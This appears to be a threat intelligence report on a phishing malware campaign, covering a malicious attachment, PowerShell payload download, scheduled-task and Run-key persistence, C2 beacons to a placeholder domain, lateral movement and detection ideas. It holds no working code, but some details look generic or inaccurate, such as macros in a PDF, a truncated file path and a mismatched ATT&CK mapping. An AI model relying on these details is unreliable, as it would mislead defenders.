Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The attack utilized an advanced phishing campaign as initial access through malicious document attachments.
- Post-exploitation, the threat actor established robust persistence through scheduled tasks and registry modifications.
- Command and Control (C2) was maintained with network beacons to remote servers, employing a multi-layer encryption approach for communication.
Executive Summary
During our investigation, we encountered a sophisticated malware campaign that exploited multiple vectors for initial access, primarily via phishing emails. This sample demonstrated a high level of obfuscation and resilience, employing various tactics to maintain a foothold in the environment.
Initial Access
The threat actor initiated the attack through a carefully crafted phishing email targeting employees. The email contained an enticing subject line, which prompted victims to download a malicious PDF attachment. This document, which appeared legitimate, contained embedded macros that, when enabled, executed PowerShell commands to download the actual payload. The file path we observed was C:\Users\.
Execution & Persistence
Upon execution, the malicious PowerShell script decoded an embedded payload, which was written in .NET. This executable, identified as MalwareX, was responsible for establishing persistence. Our analysis revealed that the actor employed Windows Task Scheduler to create a task that executed the implant every time the user logged in. The created scheduled task was located in C:\Windows\System32\Tasks\MyMalwareTask.
Additionally, modifications were made to the Windows registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to ensure that the implant would launch at startup, further solidifying persistence mechanisms.
Command and Control
Following the implant’s execution, the malware initiated communication with the threat actor’s command and control server. This was a multi-stage process involving encrypted traffic to obscure the content. The C2 server, identified through DNS queries as malicious-server.com, received regular beacons every 15 minutes, using HTTP over port 443 to blend with legitimate traffic. We noted that the requests were encoded, and the payloads contained obfuscated commands for further exploitation.
Lateral Movement & Discovery
Our examination of the malware’s capabilities revealed a distinct emphasis on lateral movement. The implant utilized legitimate Windows utilities, such as WMIC and PSEXEC, to explore the network and execute commands on remote machines. During this phase, the malware crafted its own user tokens, leveraging T1106 – Native API technique to execute its commands in different user sessions without needing additional credentials.
Moreover, the implant was capable of querying AD services using PowerShell to gather information about other machines within the network, thus enabling the actor to identify valuable targets for further exploits.
Impact & Objectives
The primary objective of this campaign appeared to be data exfiltration. The implant had capabilities to collect sensitive information such as credentials, documents, and network configurations. Following successful lateral movement, the attacker sought to compromise targeted systems to extract proprietary information. The analysis of network traffic suggested a potential data leak to the attacker-controlled C2, highlighting a serious risk to the organization’s intellectual property.
MITRE ATT&CK Mapping
- T1566 – Phishing: Exploiting social engineering to deliver payloads through email.
- T1059.001 – PowerShell: Using scripts to execute command and control functionalities.
- T1105 – Remote File Copy: Using tools like PSEXEC for lateral movements.
Detection Opportunities
- Monitoring for unusual scheduled task creation can expose persistence mechanisms of the implant.
- Implementing behavioral analytics to flag deviations in PowerShell usage, particularly those involving encoded commands.
- Setting up alerts for outbound traffic to known malicious domains and unexpected hosts.
Analyst Notes
This investigation highlights the importance of user training regarding phishing and the necessity of robust endpoint security solutions. Continuous monitoring and anomaly detection should be prioritized to prevent similar incidents, as the attack utilized multiple vectors and persistence mechanisms to establish a foothold within the environment.
Source: Original Report